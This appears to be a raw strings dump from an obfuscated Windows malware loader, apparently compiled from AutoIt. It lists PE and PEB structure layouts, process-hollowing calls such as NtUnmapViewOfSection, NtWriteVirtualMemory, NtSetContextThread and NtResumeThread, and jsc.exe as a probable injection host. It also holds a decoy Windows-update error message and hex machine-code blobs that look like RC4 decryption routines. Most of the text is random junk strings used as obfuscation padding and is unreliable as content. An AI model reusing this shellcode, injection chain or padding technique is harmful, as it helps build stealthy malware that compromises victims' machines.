word Magic; byte MajorLinkerVersion; byte MinorLinkerVersion; dword SizeOfCode; dword SizeOfInitializedData; dword SizeOfUninitializedData; dword AddressOfEntryPoint; dword BaseOfCode; dword BaseOfData; dword ImageBase; dword SectionAlignment; dword FileAlignment; 
word MajorOperatingSystemVersion; word MinorOperatingSystemVersion; word MajorImageVersion; word MinorImageVersion; word MajorSubsystemVersion; word MinorSubsystemVersion; dword Win32VersionValue; dword SizeOfImage; dword SizeOfHeaders; dword CheckSum; word Subsystem; 
word DllCharacteristics; dword SizeOfStackReserve; dword SizeOfStackCommit; dword SizeOfHeapReserve; dword SizeOfHeapCommit; dword LoaderFlags; dword NumberOfRvaAndSizes
word Magic; byte MajorLinkerVersion; byte MinorLinkerVersion; dword SizeOfCode; dword SizeOfInitializedData; dword SizeOfUninitializedData; dword AddressOfEntryPoint; dword BaseOfCode; uint64 ImageBase; dword SectionAlignment; dword FileAlignment; 
word MajorOperatingSystemVersion; word MinorOperatingSystemVersion; word MajorImageVersion; word MinorImageVersion; word MajorSubsystemVersion; word MinorSubsystemVersion; dword Win32VersionValue; dword SizeOfImage; dword SizeOfHeaders; dword CheckSum; 
word Subsystem; word DllCharacteristics; uint64 SizeOfStackReserve; uint64 SizeOfStackCommit; uint64 SizeOfHeapReserve; uint64 SizeOfHeapCommit; dword LoaderFlags; dword NumberOfRvaAndSizes
StringIsFloat('eOmqkswi')
WinGetPos('INTELLIGENCE@COFFEE@TRANSFERS@LONGITUDE@CARRIER@')
Eur#Flows#Shepherd#Tobago#
HWnd('renew=scary=gtk=duck=')
WinGetPos('doe    max    yo    ')
HWnd('IMPLEMENT+BELTS+')
administrative    Locally    
FKtrkf
OFWJYzLkrVN
Buddy    Bm    According    
StringIsFloat('UURZQRfBRwfG')
AddressOfEntryPoint
StringIsFloat('hJbExqjeToI')
HWnd('peripherals=Informational=Frequency=')
DriveGetSerial('wRncVppBRUgwJIcn')
Sqrt(22035)
Sqrt(39205)
XbepvKD
SizeOfHeaders
lPZhVXX
aiNFkxCaFP
qynHyosMFjqMI
ImageBase
ata#voting#parade#sequences#redeem#
Detector-Low-Numerical-
surf vessels november contracts roster 
Hewlett-Cp-Syntax-Jul-
SizeOfImage
blHNkVDm
JJujSbzuYhEVClbD
pkhmpjuvxQG
DriveGetSerial('TWLuiBM')
mRxosXD
kyOYvAi
nOZguupNDfXA
TRAY^SPARE^WINTER^PROCEED^SEAL^
dword VirtualAddress; dword Size
Sqrt(38164)
FJzeqLPv
WinGetPos('CB*ZIMBABWE*DIANE*YEARS*BIOLOGY*')
XGrlJta
Sqrt(51824)
HWnd('MASTURBATION!ARMS!EXPLANATION!MUZE!FINANCING!')
WinGetPos('goat=cdt=stated=')
follows=Case=Swimming=
functional^prayer^helicopter^confidentiality^
oBhs
85
Firewall=Nudist=Determining=
DriveGetSerial('nvzjoBQODnyBJadlD')
HWnd('poor#Terrorist#')
textbook*Wireless*Investor*
cure-Plugins-Month-Haiti-
caring!sitting!
154
SENSORS@WHOM@ACROSS@EXCELLENT@
129
Sqrt(25312)
xLsrka
slide/movers/randy/
kJurhEpK
uTImTMWSvh
vIcNQeRLQxico
HWnd('tel^Rw^Functioning^Fork^Declared^')
Concrete=Trial=Financing=
Sqrt(12237)
evening!Connectors!Stewart!Oxford!
WinGetPos('Ate/Wire/Vbulletin/Eos/Walked/')
Table    Mississippi    Comparative    Hardcore    
BOjTHCcWKGbmKka
JuOqibsdJWk
Memory=Prior=
HAfwHPYWovg
ldJgqxKhAV
oXtTSEuf
cwDKgDuFsJpGw
DriveGetSerial('bgJEAsBXt')
mPDrxyPB
KiatuNfiguSK
WfvrKJljLN
rpFkkETCk
Jfvrjw
reFkjDjqBwKfgh
BUdWxACPo
dUZnCwHkDCIZtteoeVZUSUaWXXZRu
PATROL    PJ    
Sqrt(38878)
WinGetPos('OB@AOL@SHOWCASE@BEARING@')
downloadcom^happiness^experiencing^pork^
savannah@Cell@Bob@Physical@
phases=margaret=ddr=pushing=report=
SWCjBRd
Aside#Memphis#
REhMSxTfd
qeqzhrAoxmtSosnY
TnPTLURbQXD
StringIsFloat('sylSesTIL')
TRULY=NOTIFICATION=SUPPORTING=
DriveGetSerial('tYogzqMVH')
NONPROFIT=ELEPHANT=PRESENTED=
Sqrt(47266)
StringIsFloat('NrqwSRYrSXDo')
DOMINANT+JEREMY+ATTRIBUTES+ASCII+LOGGING+
established=Fireplace=
OzlvDaBRG
lAAQEnWGVPnZy
DUepsVMvq
iqKcChzwNRfCEnwDhTcYEiYM
DriveGetSerial('NeqtVbscA')
187
StringIsFloat('PTFlkdCKvLc')
CPuOgCQfRV
KDosGHgbua
BIRTHDAY    FOLLOWED    KENYA    PEE    INDIANS    
Omissions!Yukon!Tuition!
Bacterial+Lo+
Sqrt(41876)
zRExenX
pcltWEjLWZM
locations    representative    acoustic    
day@Ago@Departmental@
DtoKhTtHO
aFmTdWp
pipCRun
UQLNmUcKXJUAFmNo
bMAwnMWDAxI
gQVMf
WinGetPos('BEIJING@CROATIA@')
second#blind#
yIZeTpf
WinGetPos('DDR KURT BRUNSWICK ACCESSIBLE BUNCH ')
HZPzWCRrzZhgdI
char Name[8]; dword UnionOfVirtualSizeAndPhysicalAddress; dword VirtualAddress; dword SizeOfRawData; dword PointerToRawData; dword PointerToRelocations; dword PointerToLinenumbers; word NumberOfRelocations; word NumberOfLinenumbers; dword Characteristics
TBxexBA
OxJxMcGLExD
JoMwPt
StringIsFloat('lsBbcpOm')
nkOTFFCxWgvS
CKZSaKjsFySJlJc
qwbDAQBP
StringIsFloat('oxTSzSKI')
DriveGetSerial('tADNJRxYjsgLCudVD')
SizeOfRawData
REQUIRED    JOIN    ANDREAS    SAVES    
112
ucSADWIfE
GlQJplDHAM
ngrmlbAclg
PointerToRawData
shoe herbal rev ensures 
way!Junction!Generator!Troops!Nervous!
DriveGetSerial('OeKbUKpHji')
WinGetPos('iowa@academics@finding@example@')
1
fQpFWofpqZAiSLgcMGZ
vEoeTIfMVS
bright!Aaa!Programming!Carbon!Gsm!
DriveGetSerial('pGvlBGIPHT')
Sqrt(48278)
189
HWnd('hit@bay@transcript@tan@latina@')
UnionOfVirtualSizeAndPhysicalAddress
StringIsFloat('JprqmXFMpGjI')
WinGetPos('PLATE@TWINS@INCLUSION@')
JFoGvtFryz
HWnd('knock@Proudly@')
WIRED*GOOD*STRAIGHT*
140
servers=Regulatory=Elephant=
organized=meets=
niGmDEzAXkxteJJiuyRelTpww
Gap=Bank=
ntdll.dll
NtWriteVirtualMemory
dword_ptr*
MUSLIM    BILL    UNDERGRADUATE    
Sqrt(39805)
rqoDYPGPDbDPQGPKo
cgXYNJEYUcFqwg
DriveGetSerial('IIRvdwi')
SlnRiYmQU
StringIsFloat('oCLkYjQExzGEsy')
JCLOGxUbN
QCaQyUGQc
XzWvvz
Intelligence-Cyprus-
Foo Parker 
rzPKoIPVLpvXmCuu
iKYhUzrOS
affair*Hugh*Classified*Seed*
kOXPxjoO
zjhlphBNxvP
StringIsFloat('lhmwwucj')
lock jj idaho its another 
Distant#Us#Popularity#Album#Memories#
byte InheritedAddressSpace; byte ReadImageFileExecOptions; byte BeingDebugged; byte Spare; ptr Mutant; ptr ImageBaseAddress; ptr LoaderData; ptr ProcessParameters; ptr SubSystemData; ptr ProcessHeap; ptr FastPebLock; ptr FastPebLockRoutine; ptr FastPebUnlockRoutine; dword EnvironmentUpdateCount; ptr KernelCallbackTable; ptr EventLogSection; ptr EventLog; ptr FreeList; 
dword TlsExpansionCounter; ptr TlsBitmap; dword TlsBitmapBits[2]; ptr ReadOnlySharedMemoryBase; ptr ReadOnlySharedMemoryHeap; ptr ReadOnlyStaticServerData; ptr AnsiCodePageData; ptr OemCodePageData; ptr UnicodeCaseTableData; dword NumberOfProcessors; dword NtGlobalFlag; byte Spare2[4]; int64 CriticalSectionTimeout; dword HeapSegmentReserve; dword HeapSegmentCommit; 
dword HeapDeCommitTotalFreeThreshold; dword HeapDeCommitFreeBlockThreshold; dword NumberOfHeaps; dword MaximumNumberOfHeaps; ptr ProcessHeaps; ptr GdiSharedHandleTable; ptr ProcessStarterHelper; ptr GdiDCAttributeList; ptr LoaderLock; dword OSMajorVersion; dword OSMinorVersion; dword OSBuildNumber; dword OSPlatformId; dword ImageSubSystem; dword ImageSubSystemMajorVersion; 
dword ImageSubSystemMinorVersion; dword GdiHandleBuffer[34]; dword PostProcessInitRoutine; dword TlsExpansionBitmap; byte TlsExpansionBitmapBits[128]; dword SessionId
Guitars/Ab/Narrow/
Investigators/Mailing/Herald/Bus/Insert/
NtReadVirtualMemory
ULTRAM*BRIDE*R*BATHROOMS*
Sqrt(23502)
ImageBaseAddress
CMS/ALIGN/
DriveGetSerial('WhXTUbbK')
199
call+terrace+
BbdmDCAJsx
Sqrt(11331)
DriveGetSerial('ZJmglSKVOaJN')
Eagles^Tooth^Investors^
UIUuE
gxXwloxCYzWpnMgR
xbYxIBDGhX
StringIsFloat('tZYhIUuqUvzCAn')
Eax
Contractor Rental 
Virtual*Mp*Affect*Specials*Going*
Alt^Discounts^First^
Rcx
sic+site+described+eval+lesbian+
Accent/Inclusive/Aggressive/Those/
StringIsFloat('RKADJiQpLsR')
WinGetPos('SINGER#TREATY#SENATOR#LEON#CEREMONY#')
90
Computational/Tv/Ac/Multi/Affairs/
Retention!Outer!Qualifications!
PERFORMANCES@PLANNED@ISLAM@PATHOLOGY@
HWnd('LAMPS+TAIL+SHEER+ACCESS+SPLIT+')
shoppercom-Educators-Palestinian-
Outer@Passion@Milwaukee@Yacht@
iCIwxe
MJqZPzHiqZia
dword_ptr tempik;
Warren*Ati*
gXNOOUDIuNncpNTWBK
AOjYXNmsTaHBTxsznEtMikApiktt
xPuUkjbzaDMcSsktYgiimDxTYGsv
November=Amounts=Desktops=Ecology=Proven=
deborah^Http^
COMPLICATIONS-REDHEAD-
VoPbfuiaYkTmhtXDJSbrGcYx
SEVEN/NB/
36
tempik
enter@gray@currencies@burton@pig@
NtProtectVirtualMemory
HWnd('WED@BASS@')
Sqrt(14960)
DriveGetSerial('SnTtG')
19
StringIsFloat('pLJAsJbeP')
zmozvP
dpJZyFVqZkFEbZw
EJuHKoZK
StringIsFloat('UpltTlNgcIa')
circus#Project#Barnes#Rainbow#
NtSetContextThread
DriveGetSerial('NvdCaZflUxqn')
gepIiAvqf
ZeulzLxybgpgwU
mDqEHtIb
Sqrt(40478)
cZaKgJUL
FDeTZkMrnoTmm
AdvcZFa
ZYxmqzgRinHwxDiLbmT
ZjtXXUZQwOznxg
NtResumeThread
long*
DriveGetSerial('wmgqLDOTOHtYSfLa')
WinGetPos('cycle*Folders*')
StringIsFloat('izpTaTTDTfQCk')
un+Uv+Namespace+Playing+
WinGetPos('hentai-conditions-trial-')
mdYNwzg
brlBrrPgosGw
koAHuL
Cafe Golf Joan 
treasurer!advise!
DIABETES^ENABLE^MINI^
IpdOBrQ
dcXFrTCZZGY
JsLTmig
HWnd('MASTERS!N!PUMP!')
136
dkrJeo
PmjsLbIvNVRWDkNXHw
DxxxjflB
explore-Pulled-Consulting-Com-
AMBER*FR*LT*NU*PAKISTAN*
Sqrt(28603)
Sqrt(62361)
Chances#Drug#Written#
Sqrt(54852)
omega/Ir/Registration/Interactive/Complement/
HnfDOyQdS
StringIsFloat('QCpEgQaRuGO')
HWnd('Manufacturer/Languages/')
uZgygnUwMvgKJrHHLzs
ILoIHicigwKb
HWnd('possess/plots/polyester/')
gwZynpZpj
kbAgvIEUDfLlncFM
MiAgZEdAD
Arising@Textile@Cloudy@Associates@
ipod!Organizations!Enterprise!Brunette!Seniors!
162
StringIsFloat('sONBNRegQ')
StringIsFloat('BbkXXjPjSJJ')
wKQIvwdo
DxboHjOfCG
YacVSsNErLzhg
lresult
SendMessage
wparam
lparam
DriveGetSerial('uCKFQKjdEzHRHtoXm')
OL    SUGGESTS    LETTING    MEL    
rmbkYbbBozoYqCfhPVrCUZiHdt
answers-Candy-Fuji-Mess-
MARIAH=LICENSES=
HOLIDAY/BARGAINS/INTRODUCES/TION/
beastiality#angela#referral#terrace#usual#
xQcsDV
WhcvESip
PRvrZO
LQOBfsI
BpxMOwe
aLJOLxHkpH
elizabeth@Ob@Translations@
NRMNT
marcus!disney!poultry!
S
george#searches#designers#detroit#nv#
webcams    convinced    jim    door    
regards-valley-meters-safe-
OGtsADBPDbtUpdMN
honzcLgaept
interracial=Institutes=Arrow=
EKjuZdswqZbWVVnMZGJ
sAoy
starting/halo/adopted/cuts/
Error: Failed to configure Windows updates. Undo changes.
Windows updates. Undo changes
wooden    wearing    
StringIsFloat('UPAAsAgpmrHl')
xnlQoMZA
TcAvstROCriEQlSrq
mtVlXCoKZefb
HWnd('Hunting+Strategy+')
FLZBJBRSKJRhSMQ.FLZBJBRSKJRhSMQ
bYWmwgGsl
xYsethiVDxYW
YlbtAf
Sqrt(20810)
Sqrt(62754)
bWQGxSxe
StringIsFloat('rVvlVBUUwq')
xyZPqQaBAQFg
WrwwzFWG
StringIsFloat('gxOzfbiSPZAJp')
188
StringIsFloat('wJxlkARaTPlk')
StringIsFloat('OrjSOEgiCAZ')
yo-burner-previews-vector-
znBbimGuTDjkTJ
HWnd('SEVEN-HIGH-MLS-TMP-PARTLY-')
bgMcTVFpkrAPH
RgchpBA
uGxmSYMcb
HWnd('porn+hotmail+rush+discover+personality+')
OZLHbBgXW
Sqrt(64438)
HWnd('Clark^Brought^Rogers^')
detected@Planet@Handbags@Dude@
StringIsFloat('wAFXlRPArqmjy')
HWnd('Unless=Shell=Counties=Geography=')
TURNING    COS    JIMMY    REJECT    
DriveGetSerial('ESLIp')
VAULT!HTML!DESCRIPTION!
DvMAJItwPeTyGx
AMEND=DEMONSTRATES=
Sqrt(37834)
letting^bond^waters^
10
DriveGetSerial('hcXOBGiucnI')
50
DcBMDCSj
qqUYmqOEgrgjHGerIa
LVUjdczAvRzinPDmFmiT
TiVJuKrikC
pgdskIh
DriveGetSerial('VXOSbMgJMIQ')
library Devil Places Un Achievement 
StringIsFloat('SASBbSLT')
Banners+Vulnerability+Asia+Nowhere+Alert+
makeup#online#christina#reproduce#southern#
Snowboard^Ahead^
StringIsFloat('zpWgOgEsLwr')
eeSmfbdoPYL
Sqrt(45803)
lKIjYSYfyaDGWrSLey
aKipeGJWKSHAt
HWnd('MON    PHANTOM    CUSTOMERS    TROOPS    ')
advertising/us/preferences/
ytmslid
WinGetPos('Think-Projected-Qualifying-')
square    October    
vzWxBudTK
GIG    FOLLOWS    FOOTAGE    DOMINANT    
YOGhmwTygc
AOsFthRhPecgvkM
qhkMtOzJQWHbbbTO
vZtwYToKlb
analysis@vc@granted@
QUALIFY/STATISTICS/
van!Extract!
WinGetPos('RS@DELETE@TIMES@VIEWERS@')
disease@tables@shot@
qvM
perl Famous Permanent Spine Figure 
WinGetPos('Particle+Strong+Entity+')
29
HWnd('carefully#technical#')
GUGruBDmvtWLhoAnLXimSyBx
CmUrTIVBzkaN
opspnknzEMRL
sexcam^Criteria^Prayer^
DriveGetSerial('FfSwBH')
HWnd('reliance    longest    bryan    ')
Str^Sox^Growth^Cape^Becoming^
Sqrt(13055)
DriveGetSerial('vQaOgmbG')
DriveGetSerial('hKmPXWbYOlB')
FLs
StringIsFloat('MdAQobaTXACguI')
WinGetPos('CbcePGsIpdoPARQtg')
initiated=Wanna=Inspector=Permit=
finances promoted scary gps 
HWyoZJoKpbirPzKRutS
uWfPORUe
StringIsFloat('TtWkCtkDkdrBm')
Nasdaq#Hugo#Alliance#
BANGBUS+ZONING+KB+
PiUPkekKMFGgfnAF
HWnd('knowing/Carrying/Structure/Cf/')
xaqfRn
ZBVhVxtX
HlcLQTITFhnQKCOUD
AJhtpo
WinGetPos('xdrSbDZwzUHJM')
WinGetPos('food@Waste@Current@')
FIzbTaGvezXDxi
back^Essex^Bracelet^Hormone^
Psychiatry-Opponents-Huge-
pdas-greg-ict-bolivia-registry-
Sqrt(38749)
DriveGetSerial('BukOSI')
Sqrt(56239)
newport#prior#rs#dogs#
curriculum@incorporated@lil@drug@
StringIsFloat('GFGorDYMOQC')
iuroHkBQCmIKM
mVWCwpsRCprkZa
Sqrt(6984)
for    sexy    known    souls    
CONCEPTS THOROUGHLY GRAIN 
RegqXUwpfU
DriveGetSerial('SeWsE')
WinGetPos('hours@failing@updates@')
Developed#Yeah#Else#Mon#
FEMALES+ADSL+COOKED+
PASTOR=REMIX=SHOES=
WinGetPos('Periodic@Subtle@Efficiency@Caught@')
create-those-banks-arg-
INTERVALS#WESTERN#COMPETE#
ROBINSON*INDEXES*MASSIVE*
INDIVIDUALLY!LUCIA!GREENE!BEAUTIFUL!PREVIOUSLY!
BynEAbFufiKrjwHwdKuFaKDJJmW
PRESENTING*ACER*
106
KrkEieV
sICTXzIq
Sqrt(822)
ZEN*NEIGHBORS*
LqQZ
EbFFspDkPLgAzx
calm models 
StringIsFloat('LsiBMkRAuXiXP')
RELATIONS!UNDERGRADUATE!CAMP!EXPERIENCE!AUTOMATION!
DriveGetSerial('TUiAOQtAvTVtkms')
8
HWnd('Biggest#Concerns#Beginner#Doubt#')
indianapolis+Qui+Priced+Okay+Accessibility+
fSPFqV
CONFIDENTIALITY    MANCHESTER    EXTERIOR    LM    
TZslawYFfhzpNto
LIMNllyGZFJiYE
zKodFviQ
wRzmcJoM
aoIjZZLlyONZB
WinGetPos('python    Dosage    ')
Sqrt(12418)
PRxiCqaKMuvOfXPgi
working@March@Sizes@Fire@Cliff@
VPN@INTER@SPOTS@ANDORRA@OAKS@
Sqrt(47899)
StringIsFloat('LuaxmITUWlRpaG')
discretion    k    buffalo    replied    benchmark    
Participating#Mpegs#Shemales#Replies#Fortune#
HWnd('mp*nos*subscriptions*vendor*activities*')
most/black/manufacturer/competitive/ep/
TDFaoq
AxfndCdWBv
JGKwnb
suLQASCXgQUPnZtdK
DriveGetSerial('QOEvRtgW')
AMPLIFIER@INDUCTION@SAPPHIRE@
BELLE^PORTFOLIO^
DriveGetSerial('IqoucbEYGs')
BpnyZcyM
NSCpzUByb
hxmbzwRZZtk
StringIsFloat('gthdeBXVnBdjy')
mqacAtPxaQItkjLDGedbzGrVxkked
heads+June+
yHlhUuVEITAtLMU
WinGetPos('bhutan/Worst/Reply/')
StringIsFloat('AXCruWqvZ')
CZwaOYzhVwUaX
djNShVMNXaSfDkt
EMcKpWaafZOi
WinGetPos('Thinkpad!Addressed!Trust!Greene!Boots!')
space#Perspectives#Vaccine#Fitness#Lodge#
Sqrt(28832)
StringIsFloat('wUvWVILW')
KaLwOnmgLnk
HWnd('zqVURMfwkyvqLpcpZSA')
qdStpcjIrPTfaZdEtw
MYwVwaiXDQaaSCWYmhH
DriveGetSerial('GIkxoHOi')
Dubai#Commodities#Champions#September#Deutsche#
tZHvPnlHuvldxzkZyS
DriveGetSerial('lUyiuH')
WinGetPos('Python*Acid*')
0
WinGetPos('A@DATABASE@DISTINGUISHED@HANDLE@DEF@')
WinGetPos('mitchell    Co    Describes    Association    Couples    ')
CsYeTQZwjovpVDcsz
BqODAYCIVWTFG
3
cIlxgpdscNLRkKRthI
uGCqlC
YDlwTCJgnIdKRoViqBE
RpqakprvBWEJ
ZnBQPJXWy
faIYniFGnfEGqFhzZz
dsblfgbxEtwfzZ
PRAISE!CHEAP!WARRANT!CANDLE!
PAT-FRAMING-
yNXeTMJ
ZTmxVBLnO
LiblbTks
DriveGetSerial('zxkMbnVVPnw')
WinGetPos('elizabeth!projected!teach!hills!')
shade*Playboy*Spirit*Properly*
concerns@uniform@productivity@pens@exist@
HWnd('Violence@Mainly@Instrument@Shoppers@Niagara@')
Sqrt(33901)
WinGetPos('qZEHDQBRSbNCGCX')
INNS+SWING+PETROLEUM+PANTS+SURROUNDING+
izjmRSPujYtSFYFjeOoxtDjnBVls
TEiOXVH
japan@Goto@
tribe=Psychological=Bridal=Rapidly=
iWISgDuUQakHQjsO
Sqrt(66358)
119
StringIsFloat('mmbdWonlnXRFNQ')
107
DriveGetSerial('NzcphWzVQl')
DriveGetSerial('PlgiiGmM')
WinGetPos('donna/jeans/')
XoegJxug
maqoVTHJJOQieWuqc
zTSAjjMRJV
FGKBlZYufxHx
mNGHEpNQUhrSKs
YnEmSibFrKCfxtKfikKTOMsI
affiliation feeds significantly 
tOvDZkiViaNvhj
cXCKou
MUD!SEEKING!FIRED!
HWnd('played#Beverly#Swiss#Trends#Comes#')
WinGetPos('Inspiration^Search^Kent^')
bOVgeokc
sWzhcA
YknLuqAbGM
VOTING#WORLDSEX#HOPEFULLY#CABIN#EXCEL#
NIinfNYHGPJiw
PHOTOGRAPHS*JEWEL*DEDICATED*ME*
HWnd('albania*mods*')
STATING!HOCKEY!BUCKS!BBS!INTERVENTION!
CHARGER=RECREATION=
dYHCwyxcNAmIj
WZlRBCe
reviewed+charts+
dXZqYzrlGTbahnMuNrU
rRJEuYe
hYQSYvtEjyNABCzULRz
Sp#Su#Hobby#
Dependence=Yn=Stick=Violin=
166
ScNsjas
YEMTtLffajuWt
wolVLZvVxpZDeB
HWnd('opened/cvs/')
StringIsFloat('JMTlksQyi')
Sqrt(29248)
pqhzGF
JtWgCbIuazYt
DgdrprhzmKeMF
photoshop!external!
manually*Screensavers*Mozilla*
60
bMTkpYQo
rHfqYb
ITSELF MIGHTY DOMAIN WAVE 
23
native+wizard+charging+
HWnd('Begins^Oldest^Trinity^Said^Imports^')
haFuecPWNli
AUFqj
mFobfOcV
znUDDazaRnMq
EwBCrGb
TcmIVMegfBwPfL
btTGh
RZxsfmzLsLfzdQS
ZvQIzXSzTjmdh
HWnd('diesel^collins^')
Wrapped=Hitting=
\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Respiratory*Size*Sponsors*Commerce*
sTriAyaXi
sfKRYHLwloj
DriveGetSerial('UYjZNRcp')
HWnd('wallpapers^Income^Retirement^')
success@Repeat@Discussions@Turns@
8234942558510335355217329
GetTickCount
ZXzpiA
Sqrt(10440)
committees*restriction*infrastructure*
Nfp
DWORD
Sleep
HWnd('bare Wallpaper Merit ')
StringIsFloat('agiepByFbFSok')
brazilian Republican 
54
NtUnmapViewOfSection
StringIsFloat('pIdkcuHD')
Sqrt(55348)
performs=Clothes=Hungry=
WinGetPos('SUITES@ARRAY@AVAILABILITY@LIMITING@SEAS@')
Sqrt(56235)
yhGDaZGq
Guild*Ronald*Dx*
Worldcat    Everybody    Taylor    Labs    
WpInxJUBXglFpKCGzHPeCjxFWRqf
RiNAGYDRRpCcKPeCCJEIwtdQupnVf
WinGetPos('ACCREDITATION/DINNER/')
nipples=Milk=Irish=
Sqrt(8620)
133
Miller=Representing=Referring=Submit=
HWnd('interventions#bhutan#')
publicity#cameras#glossary#
Processor*Eggs*Ibm*
HiSEGzfphWFhYyQCoC
DriveGetSerial('kJKOolXfVwHjb')
Pursuit Si Cum Detective 
Boy!Memories!Warcraft!Consequence!
WinGetPos('Motivation=Collected=Separation=')
CREEK=SPIES=
pipes doctor blessed complications 
WinGetPos('BECOMING*CURRENTLY*CHALLENGING*YACHT*GUARANTEED*')
ZcMUNJtGg
DOx
HWnd('Sheets Summaries ')
cooling/layout/
WpISqNYsIi
Fossil-Tb-Recordings-Soul-
Competing Filtering Notice 
73
saved+file+representation+
61
rbBRpBNLiuwc
DwmXrYOoNU
sports headers curves 
WinGetPos('Bye Adaptation Boutique Glad ')
HWnd('STOCKHOLM#CATEGORIES#')
FJxssJsZjG
BAvUuuYOOSIJv
Allowed@Hard@Dc@
Naughty Slovak 
wUSZrROjFXLNx
Sqrt(43660)
Ri Installed Order Fear 
abraham+nikon+town+
cWxflGbsilI
OGQJctzq
Dot-Rocks-Dual-
body-Tongue-Nudist-Screw-
Roll    Canvas    V    Interference    Metropolitan    
kAgabOhqd
BbCNAovPdJQfMlG
VZqyycMY
StringIsFloat('MUQgTQzF')
Sqrt(21921)
WinGetPos('SADDAM#BUTTONS#SENSORS#SHEPHERD#VIOLATION#')
Sqrt(24186)
yourself-Consumption-Arrive-Cambridge-Suites-
scored+wa+
VELHwuQWTC
AtMSoep
DriveGetSerial('uWlOTRgMTwqfjgioK')
WinGetPos('SHED*ARISING*LLC*CYLINDER*')
StringIsFloat('tuHGyefrnfYUeP')
WinGetPos('successfully    Bukkake    Sheet    Receiving    Few    ')
measurement/barbie/
StringIsFloat('TnBSiRQjnLLiE')
rna know occupation msn screens 
THOROUGHLY!COLORED!BRITISH!INSIDER!
izfwZC
lIyDMr
Sqrt(40867)
Sqrt(743)
rlKEDXR
cqbethdOCnql
dTfOTB
StringIsFloat('sVpPsVVY')
sacred!circumstances!requiring!lesbian!
IEydRkYHi
BukvMkq
FANTASTIC!INNS!CONFIDENT!MONITORING!NEWTON!
brilliant-movie-pads-confirm-
StringIsFloat('iPgcmulhnRIb')
LskMDeQpPl
XozyWqkLrLxHYHfJz
GGGpeeNmvsM
HWnd('pjbkpDaKCEbjf')
Illustrated Assure Deleted Solaris Maps 
characters#security#quarterly#arkansas#mono#
HWnd('WIDTH/NOV/')
VQrVL
dvrqPq
Jungle@Mobiles@Great@Management@
StringIsFloat('uVRrHqqkDkr')
flashing    digest    antenna    joke    bed    
HWnd('exciting-Request-Ref-Billing-Obj-')
DriveGetSerial('lSJclrLWpQucgG')
euItMzqpltzDSHnAIRqXW
fence#download#
sg+universal+
sbRKTgSIigTucFpxxCvO
zjAeIoyGGatWR
sCgnVoOgsTOf
constant@mp@sail@chester@annex@
bRtNeeijLJ
PROGRAM-TEAM-BOOKING-WEED-WHALE-
queensland!Singer!Field!
RTVMbGMbdisKvdFtkpv
HWnd('task*refuse*deployment*bored*')
PyLTLa
WsStDbgGs
RtlDecompressBuffer
ushort
PzOAxVAKXR
kw=Spokesman=Going=Oxford=Picking=
StringIsFloat('gaTUWINXTJ')
Sqrt(23692)
FACE=B=INTRODUCED=
WMmtDRHaxPpNEVQbqynQOuALpYww
EaqChrpa
yuLFtyELzazK
NrgzIle
HWnd('RADAR@SOAP@ANALYSTS@')
DeXFDO
ZwLDRVXIPbWfIygoO
PSWQBC
WLVtvuwrIMIursdYfIo
CkybhhUNlEoZ
OpenProcess
Train#Chose#
WinGetPos('country!street!shoot!huntington!')
StringIsFloat('RmuQyuwflXDXgB')
int ExitStatus; ptr PebBaseAddress; ptr AffinityMask; ptr BasePriority; ulong UniqueProcessId; ulong InheritedFromUniqueProcessId;
WinGetPos('arc!Ever!')
compile*guess*refined*
HWnd('Rob Term Antigua ')
WinGetPos('mortality    Bobby    Ladies    ')
AEciyCe
ZwQueryInformationProcess
zNMiIfhkTymIYqmHr
moeQbyo
StringIsFloat('zvbyITyAoe')
MANGA/STAND/STANDARDS/
cMNrObaagFHZa
ELnsPdVvXnvT
GsGxleYG
oWThAXay
dqCjjvhWwoX
DEALERS/COURTESY/SHOPPERCOM/LOOPS/
ReadProcessMemory
FsvDAnoxMLptFuUDuNpwgm
GARMIN*EXHIBITS*
ushort Length;ushort MaxLength;ptr String
risk-For-Adjustment-Instead-U-
StringIsFloat('UprXMxpAsX')
reel=Domestic=Laboratories=End=Adults=
184
StringIsFloat('kWUbUMVC')
StringIsFloat('KzFuABEdnNj')
kEGMJxMK
SiDLMlMZwrFXxtYh
WVmycPsgbmc
DriveGetSerial('GOPdptwukMEull')
WinGetPos('DOCK=TECHNO=POSTPOSTED=LOSS=MAINTAIN=')
Fo+Governing+Essentially+Architecture+
HWnd('ARRANGE@PRICING@BLOCKS@EMAIL@')
String
Length
int*
Sqrt(54836)
obvious*Fin*Consecutive*Males*
StringIsFloat('szmWvByd')
Array!Patrick!
inquiries Built Cosmetic Cindy 
DriveGetSerial('CWqJDufZ')
(\.\w{3}\
{0,1})(.*)
PhnSxndQSFaFpGYddKpo
Sqrt(19569)
UlIbYMD
mVtRHv
steps saw 
173
4
opinions!Party!
Hurt!Cms!Shirts!
WinGetPos('oregon-Matthew-Transmission-Diagnosis-Giants-')
Perform@Manchester@Scott@
DriveGetSerial('XbLkIgoYo')
0x89C0554889C84889D54989CA4531C95756534883EC08C70100000000C741040000000045884A084183C1014983C2014181F90001000075EB488DB9000100004531D2664531C9EB3641BA0100000031F60FB658080FB6142E8D3413468D0C0E450FB6C94D63D9420FB6741908408870084883C00142885C19084839F8740E4539D07EC54963F241
83C201EBC44883C4085B5E5F5DC389DB56534883EC084585C0448B11448B49047E4E4183E8014A8D7402014183C2014181E2FF0000004963DA0FB6441908468D0C08450FB6C94D63D9460FB644190844884419084288441908418D04000FB6C00FB644010830024883C2014839F275BB448911448949044883C4085B5EC3
0x89C05531C057565383EC088B4C241C8B7C2420C70100000000C74104000000008844010883C0013D0001000075F28D910001000031DB8954240489C831D2891C2489CEEB32C704240100000031ED0FB648080FB61C2F8D2C198D5415000FB6D20FB66C160889EB88580883C001884C16083B44240474128B0C24394C24247EC58B2C2483042401EBC583C4085B5E5F5DC2100089
DB5557565383EC088B5424248B44241C8B6C242085D28B188B48047E5B31D2895C2404892C248B5C240483C30181E3FF000000895C24040FB67418088B6C24048D0C0E0FB6C90FB67C080889FB885C280889F38D343781E6FF000000885C08080FB67430088B3C2489F3301C1783C2013B54242475B089EB891889480483C4085B5E5F5DC21000
vXOAMRXYg
aeghpxJrBENhzjytT
Fxbsyu
INFANTS@SEPARATE@
LbvxiSjklShwg
ClkJhOoNxgy
HWnd('bin=Removing=Boutique=')
DriveGetSerial('wpfKNJZaSL')
89C0
cigarette*devices*strength*rat*
QvWGXDfKnFBgegLYk
kbppejVL
DriveGetSerial('iHcPSCfrozsZUWMQk')
DWi
Sqrt(15111)
CINXEp
PMtQHymXAwjPPf
dollar#Regulations#Articles#
89DB
DriveGetSerial('UIbETJLiJfZEK')
bSeoXHHgYzYVdbBv
EyponbowehBz
